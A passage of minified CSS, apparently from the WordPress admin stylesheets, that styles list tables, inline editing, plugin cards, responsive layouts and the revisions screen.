none}#commentsdiv #edithead .inside input{width:160px}.sorting-indicators{display:grid}.sorting-indicator{display:block;width:10px;height:4px;margin-top:4px;margin-right:7px}.sorting-indicator:before{font:normal 20px/1 dashicons;display:inline-block;padding:0;top:-4px;right:-8px;line-height:.5;position:relative;vertical-align:top;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;text-decoration:none!important;color:#a7aaad}.sorting-indicator.asc:before{content:"\f142";content:"\f142"/''}.sorting-indicator.desc:before{content:"\f140";content:"\f140"/''}th.sorted.desc .sorting-indicator.desc:before{color:#1d2327}th.sorted.asc .sorting-indicator.asc:before{color:#1d2327}th.sorted.asc a:focus .sorting-indicator.asc:before,th.sorted.asc:hover .sorting-indicator.asc:before,th.sorted.desc a:focus .sorting-indicator.desc:before,th.sorted.desc:hover .sorting-indicator.desc:before{color:#a7aaad}th.sorted.asc a:focus .sorting-indicator.desc:before,th.sorted.asc:hover .sorting-indicator.desc:before,th.sorted.desc a:focus .sorting-indicator.asc:before,th.sorted.desc:hover .sorting-indicator.asc:before{color:#1d2327}.wp-list-table .toggle-row{position:absolute;left:8px;top:10px;display:none;padding:0;width:40px;height:40px;border:none;outline:0;background:0 0}.wp-list-table .toggle-row:hover{cursor:pointer}.wp-list-table .toggle-row:focus:before{box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color,#3858e9);outline:2px solid transparent}.wp-list-table .toggle-row:active{box-shadow:none}.wp-list-table .toggle-row:before{position:absolute;top:-5px;right:10px;border-radius:50%;display:block;padding:1px 0 1px 2px;color:#3c434a;content:"\f140";content:"\f140"/'';font:normal 20px/1 dashicons;line-height:1;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.wp-list-table .is-expanded .toggle-row:before{content:"\f142";content:"\f142"/''}.check-column{position:relative}.check-column label{box-sizing:border-box;width:100%;height:100%;display:block;position:absolute;top:0;right:0}.check-column input{position:relative;z-index:1}.check-column .label-covers-full-cell:hover+input:not(:disabled){box-shadow:0 0 0 1px #2271b1}.check-column input:hover+label,.check-column label:hover{background:rgba(0,0,0,.05)}.locked-indicator{display:none;margin-right:6px;height:20px;width:16px}.locked-indicator-icon:before{color:#8c8f94;content:"\f160";content:"\f160"/'';display:inline-block;font:normal 20px/1 dashicons;vertical-align:middle;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.locked-info{display:none;margin-top:4px}.locked-text{vertical-align:top}.wp-locked .locked-indicator,.wp-locked .locked-info{display:block}tr.wp-locked .check-column input[type=checkbox],tr.wp-locked .check-column label,tr.wp-locked .row-actions .inline,tr.wp-locked .row-actions .trash{display:none}#menu-locations-wrap .widefat{width:60%}.widefat th.sortable,.widefat th.sorted{padding:0}th.sortable a,th.sorted a{display:block;overflow:hidden;padding:8px}th.sortable a:focus,th.sorted a:focus{border-radius:2px;box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color,#3858e9);outline:2px solid transparent}th.sortable a span,th.sorted a span{float:right;cursor:pointer}.tablenav-pages .current-page{vertical-align:top;margin:0 0 0 2px;font-size:13px;text-align:center;min-height:32px;padding:0 8px}.tablenav .total-pages{margin-left:2px}.tablenav #table-paging{margin-right:2px}.tablenav{clear:both;height:32px;margin:6px 0 4px;vertical-align:middle}.tablenav.themes{max-width:98%}.tablenav .tablenav-pages{float:left;margin:0 0 9px}.tablenav .no-pages,.tablenav .one-page .pagination-links{display:none}.tablenav .tablenav-pages .button,.tablenav .tablenav-pages .tablenav-pages-navspan{display:inline-block;vertical-align:baseline;min-width:32px;min-height:32px;margin:0;padding:0 4px;font-size:16px;line-height:1.875;text-align:center}.tablenav .displaying-num{margin-left:7px}.tablenav .one-page .displaying-num{display:inline-block;margin:5px 0}.tablenav .actions{padding:0 0 0 8px}.wp-filter .actions{display:inline-block;vertical-align:middle}.tablenav .delete{margin-left:20px}.tablenav .view-switch{float:left;margin:0 5px;padding-top:3px}.wp-filter .view-switch{display:inline-block;vertical-align:middle;padding:12px 0;margin:0 2px 0 8px}.media-toolbar.wp-filter .view-switch{margin:0 2px 0 12px}.view-switch a{float:right;width:28px;height:28px;text-align:center;line-height:1.84615384;text-decoration:none}.view-switch a:before{color:#c3c4c7;display:inline-block;font:normal 20px/1 dashicons;vertical-align:middle;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.view-switch a:focus:before,.view-switch a:hover:before{color:#787c82}.view-switch a.current:before{color:#2271b1}.view-switch .view-list:before{content:"\f163";content:"\f163"/''}.view-switch .view-excerpt:before{content:"\f164";content:"\f164"/''}.view-switch .view-grid:before{content:"\f509";content:"\f509"/''}.filter{float:right;margin:-5px 10px 0 0}.filter .subsubsub{margin-right:-10px;margin-top:13px}.screen-per-page{width:4em}#posts-filter .wp-filter{margin-bottom:0}#posts-filter fieldset{float:right;margin:0 0 1em 1.5ex;padding:0}#posts-filter fieldset legend{padding:0 1px .2em 0}p.pagenav{margin:0;display:inline}.pagenav span{font-weight:600;margin:0 6px}.row-title{font-size:14px!important;font-weight:600}.column-comment .comment-author{margin-bottom:.6em}.column-author img,.column-comment .comment-author img,.column-username img{float:right;margin-left:10px;margin-top:1px}.row-actions{color:#646970;font-size:13px;padding:2px 0 0;position:relative;right:-9999em}.rtl .row-actions a{display:inline-block}.row-actions .network_active,.row-actions .network_only{color:#000}.comment-item:hover .row-actions,.mobile .row-actions,.no-js .row-actions,.row-actions.visible,tr:hover .row-actions{position:static}.row-actions-visible{padding:2px 0 0}#wpbody-content .inline-edit-row fieldset{float:right;margin:0;padding:0 0 0 12px;width:100%;box-sizing:border-box}#wpbody-content .inline-edit-row td fieldset:last-of-type{padding-left:0}tr.inline-edit-row td{padding:0;position:relative}.inline-edit-wrapper{display:flow-root;padding:0 12px;border:1px solid transparent;border-radius:4px}.inline-edit-wrapper:focus{border-color:var(--wp-admin-theme-color,#3858e9);box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color,#3858e9);outline:2px solid transparent}#wpbody-content .quick-edit-row-post .inline-edit-col-left{width:40%}#wpbody-content .quick-edit-row-post .inline-edit-col-right{width:39%}#wpbody-content .inline-edit-row-post .inline-edit-col-center{width:20%}#wpbody-content .quick-edit-row-page .inline-edit-col-left{width:50%}#wpbody-content .bulk-edit-row-post .inline-edit-col-right,#wpbody-content .quick-edit-row-page .inline-edit-col-right{width:50%}#wpbody-content .bulk-edit-row .inline-edit-col-left{width:30%}#wpbody-content .bulk-edit-row-page .inline-edit-col-right{width:69%}#wpbody-content .bulk-edit-row .inline-edit-col-bottom{float:left;width:69%}#wpbody-content .inline-edit-row-page .inline-edit-col-right{margin-top:27px}.inline-edit-row fieldset .inline-edit-group{clear:both;line-height:2.5}.inline-edit-row .submit{display:flex;flex-wrap:wrap;align-items:center;clear:both;margin:0;padding:.5em 0 1em}.inline-edit-save.submit .button{margin-left:8px}.inline-edit-save .spinner{float:none;margin:0}.inline-edit-row .notice-error{box-sizing:border-box;min-width:100%;margin-top:1em}.inline-edit-row .notice-error .error{margin:.5em 0;padding:2px}#the-list .inline-edit-row .inline-edit-legend{margin:0;padding:.2em 0;line-height:2.5;font-weight:600}.inline-edit-row fieldset span.checkbox-title,.inline-edit-row fieldset span.title{margin:0;padding:0}.inline-edit-row fieldset label,.inline-edit-row fieldset span.inline-edit-categories-label{display:block;margin:.2em 0;line-height:2.5}.inline-edit-row fieldset.inline-edit-date label{display:inline-block;margin:0;vertical-align:baseline;line-height:2}.inline-edit-row fieldset label.inline-edit-tags{margin-top:0}.inline-edit-row fieldset label.inline-edit-tags span.title{margin:.2em 0;width:auto}.inline-edit-row fieldset label span.title,.inline-edit-row fieldset.inline-edit-date legend{display:block;float:right;width:6em;line-height:2.5}#posts-filter fieldset.inline-edit-date legend{padding:0}.inline-edit-row fieldset .timestamp-wrap,.inline-edit-row fieldset label span.input-text-wrap{display:block;margin-right:6em}.quick-edit-row-post fieldset.inline-edit-col-right label span.title{width:auto;padding-left:.5em}.inline-edit-row .inline-edit-or{margin:.2em 0 .2em 6px;line-height:2.5}.inline-edit-row .input-text-wrap input[type=text]{width:100%}.inline-edit-row fieldset label input[type=checkbox]{vertical-align:middle}.inline-edit-row fieldset label textarea{width:100%;height:4em;vertical-align:top}.inline-edit-row input:where(:not([type=checkbox],[type=radio],[type=submit],[type=button])),.inline-edit-row select{min-height:32px;padding:0 8px 0 8px}.inline-edit-row select{line-height:2.14285714;padding-left:24px}#wpbody-content .bulk-edit-row fieldset .inline-edit-group label{max-width:50%}#wpbody-content .quick-edit-row fieldset .inline-edit-group label.alignleft:first-child{margin-left:.5em}.inline-edit-col-right .input-text-wrap input.inline-edit-menu-order-input{width:6em}.inline-edit-row .inline-edit-legend{text-transform:uppercase}.inline-edit-row fieldset .inline-edit-date{float:right}.inline-edit-row fieldset input[name=aa],.inline-edit-row fieldset input[name=hh],.inline-edit-row fieldset input[name=jj],.inline-edit-row fieldset input[name=mn]{vertical-align:middle;text-align:center;padding:0 4px}.inline-edit-row fieldset label input.inline-edit-password-input{width:8em}#bulk-titles-list,#bulk-titles-list li,.inline-edit-row fieldset ul.cat-checklist input,.inline-edit-row fieldset ul.cat-checklist li{margin:0;position:relative}.inline-edit-row fieldset ul.cat-checklist input{margin-top:-1px;margin-right:3px}.inline-edit-row fieldset label input.inline-edit-menu-order-input{width:3em}.inline-edit-row fieldset label input.inline-edit-slug-input{width:75%}.inline-edit-row select[name=page_template],.inline-edit-row select[name=post_parent]{max-width:80%}.quick-edit-row-post fieldset label.inline-edit-status{float:right}#bulk-titles,ul.cat-checklist{height:14em;border:1px solid #ddd;margin:0 0 5px;padding:.2em 5px;overflow-y:scroll}ul.cat-checklist input[name="post_category[]"]:indeterminate::before{content:'';border-top:2px solid grey;width:65%;height:2px;position:absolute;top:calc(50% + 1px);right:50%;transform:translate(50%,-50%)}#bulk-titles .ntdelbutton,#bulk-titles .ntdeltitle,.inline-edit-row fieldset ul.cat-checklist label{display:inline-block;margin:0;padding:3px 0;line-height:20px;vertical-align:top}#bulk-titles .ntdelitem{padding-right:23px}#bulk-titles .ntdelbutton{width:26px;height:26px;margin:0 -26px 0 0;text-align:center;border-radius:3px}#bulk-titles .ntdelbutton:before{display:inline-block;vertical-align:top}#bulk-titles .ntdelbutton:focus{box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color,#3858e9);outline:2px solid transparent;outline-offset:0}.plugins tbody,.plugins tbody th.check-column{padding:8px 2px 0 0}.plugins tbody th.check-column input[type=checkbox]{margin-top:4px}.updates-table .plugin-title p{margin-top:0}.plugins .inactive th.check-column,.plugins tfoot td.check-column,.plugins thead td.check-column{padding-right:6px}.plugins,.plugins td,.plugins th{color:#000}.plugins tr{background:#fff}.plugins p{margin:0 4px;padding:0}.plugins .desc p{margin:0 0 8px}.plugins td.desc{line-height:1.5}.plugins .desc ol,.plugins .desc ul{margin:0 2em 0 0}.plugins .desc ul{list-style-type:disc}.plugins .row-actions{font-size:13px;padding:0}.plugins .active td,.plugins .active th,.plugins .inactive td,.plugins .inactive th{padding:10px 9px}.plugins .active td,.plugins .active th{background-color:rgba(var(--wp-admin-theme-color--rgb),.08)}.plugins .update td,.plugins .update th{border-bottom:0}.plugin-install #the-list td,.plugins .active td,.plugins .active th,.plugins .inactive td,.plugins .inactive th,.upgrade .plugins td,.upgrade .plugins th{box-shadow:inset 0 -1px 0 rgba(0,0,0,.1)}.plugins tr.active+tr.inactive td,.plugins tr.active+tr.inactive th,.plugins tr.active.plugin-update-tr+tr.inactive td,.plugins tr.active.plugin-update-tr+tr.inactive th{border-top:1px solid rgba(0,0,0,.03);box-shadow:inset 0 1px 0 rgba(0,0,0,.02),inset 0 -1px 0 #dcdcde}.plugins .update td,.plugins .update th,.plugins .updated td,.plugins .updated th,.plugins tr.active+tr.inactive.update td,.plugins tr.active+tr.inactive.update th,.plugins tr.active+tr.inactive.updated td,.plugins tr.active+tr.inactive.updated th,.upgrade .plugins tr:last-of-type td,.upgrade .plugins tr:last-of-type th{box-shadow:none}.plugin-update-tr.active td,.plugins .active th.check-column{border-right:4px solid var(--wp-admin-theme-color)}.wp-list-table.plugins .plugin-title,.wp-list-table.plugins .theme-title{padding-left:12px;white-space:nowrap}.plugins .plugin-title .dashicons,.plugins .plugin-title img.plugin-icon,.plugins .plugin-title img.updates-table-screenshot{float:right;padding:0 0 0 10px;width:64px;height:64px}.plugins .plugin-title .dashicons:before{padding:2px;background-color:#f0f0f1;box-shadow:inset 0 0 10px rgba(167,170,173,.15);font-size:60px;color:#c3c4c7}#update-themes-table .plugin-title .dashicons,#update-themes-table .plugin-title img.updates-table-screenshot{width:85px}.plugins .column-auto-updates{width:14.2em}.plugins .inactive .plugin-title strong{font-weight:400}.plugins .row-actions,.plugins .second{padding:0 0 5px}.plugins .row-actions{white-space:normal;min-width:12em}.plugins .update .row-actions,.plugins .update .second,.plugins .updated .row-actions,.plugins .updated .second{padding-bottom:0}.plugins-php .widefat tfoot td,.plugins-php .widefat tfoot th{border-top-style:solid;border-top-width:1px}.plugins .plugin-update-tr .plugin-update{box-shadow:inset 0 -1px 0 rgba(0,0,0,.1);overflow:hidden;padding:0}.plugins .plugin-update-tr .notice,.plugins .plugin-update-tr div[class=update-message]{margin:5px 40px 15px 20px}.plugins .notice p{margin:.5em 0}.plugins .plugin-description a,.plugins .plugin-update a,.updates-table .plugin-title a{text-decoration:underline}.plugins tr.paused th.check-column{border-right:4px solid #b32d2e}.plugins tr.paused td,.plugins tr.paused th{background-color:#f6f7f7}.plugins .paused .dashicons-warning,.plugins tr.paused .plugin-title{color:#b32d2e}.plugins .paused .error-display code,.plugins .paused .error-display p{font-size:90%;color:rgba(0,0,0,.7)}.plugins .resume-link{color:#b32d2e}.plugin-card .update-now:before{color:#d63638;content:"\f463";content:"\f463"/'';display:inline-block;font:normal 16px/1.875 dashicons;margin:0 -2px 0 5px;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;vertical-align:top}.plugin-card .updating-message:before{content:"\f463";content:"\f463"/'';animation:rotation 2s infinite linear}@keyframes rotation{0%{transform:rotate(0)}100%{transform:rotate(-359deg)}}.plugin-card .updated-message:before{color:#68de7c;content:"\f147";content:"\f147"/''}.plugin-card .updated-message:before,.plugin-card .updating-message:before{line-height:1;position:relative;top:-2px;vertical-align:middle}.plugin-install-php #the-list{display:flex;flex-wrap:wrap}.plugin-install-php .plugin-card{display:flex;flex-direction:column;justify-content:space-between}.plugin-install-php h2{clear:both}.plugin-install-php h3{margin:2.5em 0 8px}.plugin-install-php .wp-filter{margin-bottom:0}.plugin-group{overflow:hidden;margin-top:1.5em}.plugin-group h3{margin-top:0}.plugin-card{float:right;margin:0 8px 16px;width:48.5%;width:calc(50% - 8px);background-color:#fff;border:1px solid rgb(0,0,0,.1);border-radius:8px;box-sizing:border-box;overflow:hidden}.plugin-card:nth-child(odd){clear:both;margin-right:0}.plugin-card:nth-child(2n){margin-left:0}@media screen and (min-width:1600px) and (max-width:2299px){.plugin-card{width:30%;width:calc(33.1% - 8px)}.plugin-card:nth-child(odd){clear:none;margin-right:8px}.plugin-card:nth-child(2n){margin-left:8px}.plugin-card:nth-child(3n+1){clear:both;margin-right:0}.plugin-card:nth-child(3n){margin-left:0}}@media screen and (min-width:2300px){.plugin-card{width:25%;width:calc(25% - 12px)}.plugin-card:nth-child(odd){clear:none;margin-right:8px}.plugin-card:nth-child(2n){margin-left:8px}.plugin-card:nth-child(4n+1){clear:both;margin-right:0}.plugin-card:nth-child(4n){margin-left:0}}.plugin-card-top{position:relative;padding:16px;min-height:135px}.plugin-action-buttons,div.action-links{margin:0}.plugin-card h3{margin:0 0 16px 12px;font-size:18px;line-height:1.3}.plugin-card .desc{margin-inline:0}.plugin-card .desc>p,.plugin-card .name{margin-right:148px}@media (min-width:1101px){.plugin-card .desc>p,.plugin-card .name{margin-left:128px}}@media (min-width:481px) and (max-width:781px){.plugin-card .desc>p,.plugin-card .name{margin-left:128px}}.plugin-card .column-description{display:flex;flex-direction:column;justify-content:flex-start}.plugin-card .column-description>p{margin-top:0}.plugin-card .column-description p:empty{display:none}.plugin-card .notice.plugin-dependencies{margin:auto 20px 20px;padding:15px}.plugin-card .plugin-dependencies-explainer-text{margin-block:0}.plugin-card .plugin-dependency{align-items:center;display:flex;flex-wrap:wrap;margin-top:.5em;column-gap:1%;row-gap:.5em}.plugin-card .plugin-dependency:last-child,.plugin-card .plugin-dependency:nth-child(2){margin-top:1em}.plugin-card .plugin-dependency-name{flex-basis:74%}.plugin-card .plugin-dependency .more-details-link{margin-right:auto}.rtl .plugin-card .plugin-dependency .more-details-link{margin-left:auto}@media (max-width:939px){.plugin-card .plugin-dependency-name{flex-basis:69%}}.plugins #the-list .required-by,.plugins #the-list .requires{margin-top:1em}.plugin-card .action-links{position:absolute;top:20px;left:20px;width:120px}.plugin-action-buttons{clear:left;float:left;margin-bottom:1em;text-align:left}.plugin-action-buttons li{margin-bottom:10px}.plugin-card-bottom{clear:both;padding:16px;background-color:#f6f7f7;border-top:1px solid rgb(0,0,0,.1);overflow:hidden}.plugin-card-bottom .star-rating{display:inline}.plugin-card-update-failed .update-now{font-weight:600}.plugin-card-update-failed .notice-error{margin:0;padding-right:16px;box-shadow:0 -1px 0 #dcdcde}.plugin-card-update-failed .plugin-card-bottom{display:none}.plugin-card .column-rating{line-height:1.76923076}.plugin-card .column-rating,.plugin-card .column-updated{margin-bottom:4px}.plugin-card .column-downloaded,.plugin-card .column-rating{float:right;clear:right;max-width:180px}.plugin-card .column-compatibility,.plugin-card .column-updated{text-align:left;float:left;clear:left;width:65%;width:calc(100% - 180px)}.plugin-card .column-compatibility span:before{font:normal 20px/.5 dashicons;display:inline-block;padding:0;top:4px;right:-2px;position:relative;vertical-align:top;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;text-decoration:none!important;color:#3c434a}.plugin-card .column-compatibility .compatibility-incompatible:before{content:"\f158";content:"\f158"/'';color:#d63638}.plugin-card .column-compatibility .compatibility-compatible:before{content:"\f147";content:"\f147"/'';color:#007017}.plugin-card .notice{margin:20px 20px 0}.plugin-card .plugin-icon{position:absolute;top:20px;right:20px;width:128px;height:128px;margin:0 0 20px 20px}.no-plugin-results{color:#646970;font-size:18px;font-style:normal;margin:0;padding:100px 0 0;width:100%;text-align:center}.wp-list-table .site-archived,.wp-list-table .site-deleted,.wp-list-table tr.site-archived,.wp-list-table tr.site-deleted{background:#fcf0f1}.wp-list-table .site-mature,.wp-list-table .site-spammed,.wp-list-table tr.site-mature,.wp-list-table tr.site-spammed{background:#fcf9e8}.sites.fixed .column-lastupdated,.sites.fixed .column-registered{width:20%}.sites.fixed .column-users{width:80px}@media screen and (max-width:1100px) and (min-width:782px),(max-width:480px){.plugin-card .action-links{position:static;margin-right:148px;width:auto}.plugin-action-buttons{float:none;margin:1em 0 0;text-align:right}.plugin-action-buttons li{display:inline-block;vertical-align:middle}.plugin-action-buttons li .button{margin-left:20px}.plugin-card h3{margin-left:24px}.plugin-card .desc,.plugin-card .name{margin-left:0}.plugin-card .desc p:first-of-type{margin-top:0}}@media screen and (max-width:782px){.tablenav{height:auto}.tablenav.top{margin:20px 0 5px}.tablenav.bottom{position:relative;margin-top:15px}.tablenav br{display:none}.tablenav br.clear{display:block}.tablenav .view-switch,.tablenav.top .actions{display:none}.view-switch a{width:36px;height:36px;line-height:2.53846153}.tablenav.top .displaying-num{display:none}.tablenav.bottom .displaying-num{position:absolute;left:0;top:11px;margin:0;font-size:14px}.tablenav .tablenav-pages{width:100%;text-align:center;margin:0 0 25px}.tablenav.bottom .tablenav-pages{margin-top:25px}.tablenav.top .tablenav-pages.one-page{display:none}.tablenav.bottom .actions select{margin-bottom:5px}.tablenav.bottom .actions.alignleft+.actions.alignleft{clear:right;margin-top:10px}.tablenav.bottom .tablenav-pages.one-page{margin-top:15px;height:0}.tablenav-pages .pagination-links{font-size:16px}.tablenav .tablenav-pages .button,.tablenav .tablenav-pages .tablenav-pages-navspan{min-width:40px;min-height:40px;padding:10px 8px;font-size:18px;line-height:1}.tablenav-pages .pagination-links .current-page{min-width:40px;padding:10px 6px;font-size:16px;line-height:1.125}.form-wrap>p{display:none}.wp-list-table th.column-primary~th,.wp-list-table tr:not(.inline-edit-row):not(.no-items) td.column-primary~td:not(.check-column){display:none}.wp-list-table thead th.column-primary{width:100%}.wp-list-table tr th.check-column{display:table-cell}.wp-list-table .check-column{width:2.5em}.wp-list-table .column-primary .toggle-row{display:block}.wp-list-table tr:not(.inline-edit-row):not(.no-items) td:not(.check-column){position:relative;clear:both;width:auto!important}.wp-list-table td.column-primary{padding-left:50px}.wp-list-table tr:not(.inline-edit-row):not(.no-items) td.column-primary~td:not(.check-column){padding:3px 35% 3px 8px}.wp-list-table tr:not(.inline-edit-row):not(.no-items) td:not(.column-primary)::before{position:absolute;right:10px;display:block;overflow:hidden;width:32%;content:attr(data-colname);white-space:nowrap;text-overflow:ellipsis}.wp-list-table .is-expanded td:not(.hidden){display:block!important;overflow:hidden}.column-posts,.widefat .num{text-align:right}#comments-form .fixed .column-author,#commentsdiv .fixed .column-author{display:none!important}.fixed .column-comment .comment-author{display:block}.fixed .column-author.hidden~.column-comment .comment-author{display:none}#the-comment-list .is-expanded td{box-shadow:none}#the-comment-list .is-expanded td:last-child{box-shadow:inset 0 -1px 0 rgba(0,0,0,.1)}.post-com-count .screen-reader-text{position:static;clip-path:none;width:auto;height:auto;margin:0}.column-comments .post-com-count-approved:after,.column-comments .post-com-count-no-comments:after,.column-response .post-com-count-approved:after,.column-response .post-com-count-no-comments:after{content:none}.column-comments .post-com-count [aria-hidden=true],.column-response .post-com-count [aria-hidden=true]{display:none}.column-comments .post-com-count-wrapper,.column-response .post-com-count-wrapper{white-space:normal}.column-comments .post-com-count-wrapper>a,.column-response .post-com-count-wrapper>a{display:block}.column-comments .post-com-count-approved,.column-comments .post-com-count-no-comments,.column-response .post-com-count-approved,.column-response .post-com-count-no-comments{margin-top:0;margin-left:.5em}.column-comments .post-com-count-pending,.column-response .post-com-count-pending{position:static;height:auto;min-width:0;padding:0;border:none;border-radius:0;background:0 0;color:#b32d2e;font-size:inherit;line-height:inherit;text-align:right}.column-comments .post-com-count-pending:hover,.column-response .post-com-count-pending:hover{color:#d63638}.widefat tfoot td.check-column,.widefat thead td.check-column{padding-top:10px}.row-actions{margin-left:-8px;padding-top:4px}body:not(.plugins-php) .row-actions{display:flex;flex-wrap:wrap;gap:8px;color:transparent}.row-actions span{font-size:0}.row-actions span .button-link,.row-actions span a{display:inline-block;padding:4px 0 4px 16px;font-size:13px;line-height:1.5}.row-actions span.approve:before,.row-actions span.unapprove:before{content:"| "}#wpbody-content .bulk-edit-row .inline-edit-col-bottom,#wpbody-content .bulk-edit-row .inline-edit-col-left,#wpbody-content .bulk-edit-row-page .inline-edit-col-right,#wpbody-content .bulk-edit-row-post .inline-edit-col-right,#wpbody-content .inline-edit-row-post .inline-edit-col-center,#wpbody-content .quick-edit-row-page .inline-edit-col-left,#wpbody-content .quick-edit-row-page .inline-edit-col-right,#wpbody-content .quick-edit-row-post .inline-edit-col-left,#wpbody-content .quick-edit-row-post .inline-edit-col-right{float:none;width:100%;padding:0}#the-list .inline-edit-row .inline-edit-legend,.inline-edit-row span.title{font-size:16px}.inline-edit-row p.howto{font-size:14px}#wpbody-content .inline-edit-row-page .inline-edit-col-right{margin-top:0}#wpbody-content .bulk-edit-row fieldset .inline-edit-col label,#wpbody-content .bulk-edit-row fieldset .inline-edit-group label,#wpbody-content .quick-edit-row fieldset .inline-edit-col label,#wpbody-content .quick-edit-row fieldset .inline-edit-group label{max-width:none;float:none;margin-bottom:5px}#wpbody .bulk-edit-row fieldset select{display:block;width:100%;max-width:none;box-sizing:border-box}.inline-edit-row input:where(:not([type=checkbox],[type=radio],[type=submit],[type=button])),.inline-edit-row select{min-height:40px}.inline-edit-row fieldset input[name=aa],.inline-edit-row fieldset input[name=hh],.inline-edit-row fieldset input[name=jj],.inline-edit-row fieldset input[name=mn]{font-size:16px;line-height:2;padding:3px 4px}#bulk-titles .ntdelbutton,#bulk-titles .ntdeltitle,.inline-edit-row fieldset ul.cat-checklist label{padding:6px 0;font-size:16px;line-height:28px}#bulk-titles .ntdelitem{padding-right:37px}#bulk-titles .ntdelbutton{width:40px;height:40px;margin:0 -40px 0 0;overflow:hidden}#bulk-titles .ntdelbutton:before{font-size:20px;line-height:28px}.inline-edit-row fieldset label span.title,.inline-edit-row fieldset.inline-edit-date legend{float:none}.inline-edit-row fieldset .inline-edit-col label.inline-edit-tags{padding:0}.inline-edit-row fieldset .timestamp-wrap,.inline-edit-row fieldset label span.input-text-wrap{margin-right:0}.inline-edit-row .inline-edit-or{margin:0 0 0 6px}#commentsdiv #edithead .inside,#edithead .inside{float:none;text-align:right;padding:3px 5px}#commentsdiv #edithead .inside input,#edithead .inside input{width:100%}#edithead label{display:block}#wpbody-content .updates-table .plugin-title{width:auto;white-space:normal}.link-manager-php #posts-filter{margin-top:25px}.link-manager-php .tablenav.bottom{overflow:hidden}.comments-box .toggle-row,.wp-list-table.plugins .toggle-row{display:none}#wpbody-content .wp-list-table.plugins td{display:block;width:auto;padding:10px 9px}#wpbody-content .wp-list-table.plugins .no-items td,#wpbody-content .wp-list-table.plugins .plugin-deleted-tr td{display:table-cell}#wpbody-content .wp-list-table.plugins .desc.hidden{display:none}#wpbody-content .wp-list-table.plugins .column-description{padding-top:2px}#wpbody-content .wp-list-table.plugins .plugin-title,#wpbody-content .wp-list-table.plugins .theme-title{padding-left:12px;white-space:normal}.wp-list-table.plugins .plugin-title,.wp-list-table.plugins .theme-title{padding-top:13px;padding-bottom:4px}.plugins #the-list .update td,.plugins #the-list .update th,.plugins #the-list tr>td:not(:last-child),.wp-list-table.plugins #the-list .theme-title{box-shadow:none;border-top:none}.plugins #the-list tr td{border-top:none}.plugins tbody{padding:1px 0 0}.plugins .plugin-update-tr:before,.plugins tr.active+tr.inactive td.column-description,.plugins tr.active+tr.inactive th.check-column{box-shadow:inset 0 -1px 0 rgba(0,0,0,.1)}.plugins tr.active+tr.inactive td,.plugins tr.active+tr.inactive th.check-column{border-top:none}.plugins .plugin-update-tr:before{content:"";display:table-cell}.plugins #the-list .plugin-update-tr .plugin-update{border-right:none}.plugin-update-tr .update-message{margin-right:0}.plugins .active.update+.plugin-update-tr:before,.plugins .active.updated+.plugin-update-tr:before{background-color:rgba(var(--wp-admin-theme-color--rgb),.08);border-right:4px solid var(--wp-admin-theme-color)}.plugins .plugin-update-tr .update-message{margin-right:0}.wp-list-table.plugins .plugin-title strong,.wp-list-table.plugins .theme-title strong{font-size:1.4em;line-height:1.5}.plugins tbody th.check-column{padding:8px 5px 0 0}.plugins .inactive th.check-column,.plugins tfoot td.check-column,.plugins thead td.check-column{padding-right:9px}table.plugin-install .column-description,table.plugin-install .column-name,table.plugin-install .column-rating,table.plugin-install .column-version{display:block;width:auto}table.plugin-install th.column-description,table.plugin-install th.column-name,table.plugin-install th.column-rating,table.plugin-install th.column-version{display:none}table.plugin-install td.column-name strong{font-size:1.4em;line-height:1.6em}table.plugin-install #the-list td{box-shadow:none}table.plugin-install #the-list tr{display:block;box-shadow:inset 0 -1px 0 rgba(0,0,0,.1)}.plugin-card{margin-right:0;margin-left:0;width:100%}table.media .column-title .has-media-icon~.row-actions{margin-right:0;clear:both}}@media screen and (max-width:480px){.tablenav-pages .current-page{margin:0}.tablenav.bottom .displaying-num{position:relative;top:0;display:block;text-align:left;padding-bottom:.5em}.tablenav.bottom .tablenav-pages.one-page{height:auto}.tablenav-pages .tablenav-paging-text{float:right;width:100%;padding-top:.5em}}/*! This file is auto-generated */ .revisions-control-frame,.revisions-diff-frame{position:relative}.revisions-diff-frame{top:10px}.revisions-controls{padding-top:40px;z-index:1}.revisions-controls input[type=checkbox]{position:relative;top:-1px;vertical-align:text-bottom}.revisions.pinned .revisions-controls{position:fixed;top:0;height:82px;background:#fff;box-shadow:0 1px 3px rgba(0,0,0,.1)}.revisions-tickmarks{position:relative;margin:0 auto;height:.7em;top:7px;max-width:70%;box-sizing:border-box;background-color:#fff}.revisions-tickmarks>div{position:absolute;height:100%;border-left:1px solid #a7aaad;box-sizing:border-box}.revisions-tickmarks>div:first-child{border-width:0}.comparing-two-revisions .revisions-controls{height:140px}.comparing-two-revisions.pinned .revisions-controls{height:124px}.revisions .diff-error{position:absolute;text-align:center;margin:0 auto;width:100%;display:none}.revisions.diff-error .diff-error{display:block}.revisions .loading-indicator{position:absolute;vertical-align:middle;opacity:0;width:100%;width:calc(100% - 30px);top:50%;top:calc(50% - 10px);transition:opacity .5s}body.folded .revisions .loading-indicator{margin-left:-32px}.revisions .loading-indicator span.spinner{display:block;margin:0 auto;float:none}.revisions.loading .loading-indicator{opacity:1}.revisions .diff{transition:opacity .5s}.revisions.loading .diff{opacity:.5}.revisions.diff-error .diff{visibility:hidden}.revisions-meta{margin-top:20px;background-color:#fff;box-shadow:0 1px 3px rgba(0,0,0,.1);overflow:hidden}.revisions.pinned .revisions-meta{box-shadow:none}.revision-toggle-compare-mode{position:absolute;top:0;right:0}.comparing-two-revisions .revisions-next,.comparing-two-revisions .revisions-previous,.revisions-meta .diff-meta-to strong{display:none}.revisions-controls .author-card .date{color:#646970}.revisions-controls .author-card.autosave{color:#d63638}.revisions-controls .author-card .author-name{font-weight:600}.comparing-two-revisions .diff-meta-to strong{display:block}.revisions.pinned .revisions-buttons{padding:0 11px}.revisions-next,.revisions-previous{position:relative;z-index:1}.revisions-previous{float:left}.revisions-next{float:right}.revisions-controls 